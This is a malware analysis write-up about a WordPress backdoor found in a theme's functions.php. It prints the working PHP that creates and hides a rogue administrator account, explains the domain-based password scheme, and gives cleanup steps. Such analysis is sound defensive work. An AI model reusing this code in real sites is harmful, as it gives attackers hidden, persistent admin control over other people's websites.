Hidden WordPress Admin Backdoor Malware – In-Depth Technical Review

July 30, 2025

Hidden WordPress Admin Backdoor Malware – In-Depth Technical Review

Issue Reported

Malicious PHP code discovered in WordPress theme’s functions.php file containing a sophisticated backdoor that creates a hidden administrative user account with advanced stealth capabilities.

Malware Type

Hidden Administrative Backdoor – A persistent access mechanism that automatically creates and protects a concealed administrator account, classified as a WordPress Backdoor Admin Creation Malware.

Code Breakdown and Decoding

Code Breakdown and Decoding

Primary Malware Functions

The malware consists of five interconnected PHP functions designed to create and maintain unauthorized administrative access:

1. auto_create_fallback_admin() – Core Backdoor Function

function auto_create_fallback_admin() {
    $user = get_user_by('login', 'adm1nlxg1n');

    if (!$user) {
        $site_url = site_url();
        $parsed_url = parse_url($site_url);
        $domain = str_replace('.', '', $parsed_url['host']);
        $template = array(2, 'X', 3, '3', 0, 'Y', 1, '1qP', 4, 6, 'x', 'K', 5);
        $result = '';
        foreach ($template as $item) {
            $result .= is_int($item) ? ($domain[$item] ?? '') : $item;
        }

        $args = array(
            'user_login' => 'adm1nlxg1n',
            'user_pass' => $result,
            'role' => 'administrator',
            'user_email' => 'wordpresupportadm11@gmail.com'
        );

        $id = wp_insert_user($args);
        update_option('_pre_user_id', $id);
    }
}

Password Generation Algorithm Analysis:
The malware uses a sophisticated domain-based password generation system. It extracts the website’s domain, removes dots, and applies a character template to create a unique password per site:

  • Template: [2, ‘X’, 3, ‘3’, 0, ‘Y’, 1, ‘1qP’, 4, 6, ‘x’, ‘K’, 5]
  • Process: Integers reference domain character positions, strings are added literally
  • Example: For example.com → examplecom → Password: aXm3eYx1qPpexKl

2. wc_tool_query_fallback() – User List Concealment

function wc_tool_query_fallback($user_search) {
    $user_id = get_current_user_id();
    $id = get_option('_pre_user_id');
    if (is_wp_error($id) || $user_id == $id) return;
    global $wpdb;
    $user_search->query_where = str_replace('WHERE 1=1',
        "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
        $user_search->query_where);
}

This function modifies database queries to exclude the malicious admin from user listings in the WordPress dashboard.

3. protect_user_count_fallback() – Count Manipulation

function protect_user_count_fallback($views) {
    // Reduces admin count display by 1 to hide the extra admin
    $html = explode('(', $views['all']);
    $count = explode(')', $html[1]);
    $count[0]--;
    $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
    // Similar manipulation for administrator count
    return $views;
}

4. wc_tool_profiles_fallback() – Profile Access Prevention

function wc_tool_profiles_fallback() {
    $user_id = get_current_user_id();
    $id = get_option('_pre_user_id');
    if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) {
        wp_die(__('Invalid user ID.'));
    }
}

5. protect_user_from_deleting_fallback() – Deletion Prevention

function protect_user_from_deleting_fallback() {
    $id = get_option('_pre_user_id');
    if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action'])
        && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) {
        wp_die(__('Invalid user ID.'));
    }
}

Stealth and Evasion Techniques

  • Disguised Username: Uses adm1nlxg1n instead of obvious terms like “admin”
  • Legitimate-Looking Email: wordpresupportadm11@gmail.com mimics WordPress support
  • Database Hiding: Modifies WordPress queries to exclude the user from admin interfaces
  • Count Manipulation: Reduces displayed user counts to mask the extra administrator
  • Access Protection: Prevents profile viewing and user deletion attempts
  • Domain-Specific Passwords: Generates unique passwords per website to avoid detection

WordPress Hook Integration

The malware registers its functions with WordPress hooks to execute automatically:

  • add_action('init', 'auto_create_fallback_admin') – Creates user on every page load
  • add_action('pre_user_query', 'wc_tool_query_fallback') – Hides from user queries
  • add_filter('views_users', 'protect_user_count_fallback') – Manipulates user counts
  • add_action('load-user-edit.php', 'wc_tool_profiles_fallback') – Blocks profile access
  • add_action('admin_menu', 'protect_user_from_deleting_fallback') – Prevents deletion

Security Impact and Persistence

This malware demonstrates advanced persistence mechanisms commonly found in WordPress backdoor attacks:

  • Automatic Execution: Runs on every WordPress initialization
  • Self-Protection: Multiple layers prevent detection and removal
  • Administrative Access: Full WordPress privileges for arbitrary code execution
  • Reinfection Capability: Can reinstall itself if core functions remain

The malware belongs to a broader category of WordPress backdoor malware that has been increasingly sophisticated, with security researchers noting that such attacks often evade detection by multiple security scanners.

Result

  • Remove Malicious Code: Delete all five functions from functions.php file

  • Delete Malicious User: Remove the adm1nlxg1n user account from WordPress admin

  • Clean Database: Remove the _pre_user_id option from wp_options table

  • Security Scan: Perform comprehensive malware scan for additional backdoors

  • Password Reset: Change all administrator passwords

  • File Integrity Check: Verify all WordPress core files haven’t been modified

Screenshots

Screenshot 1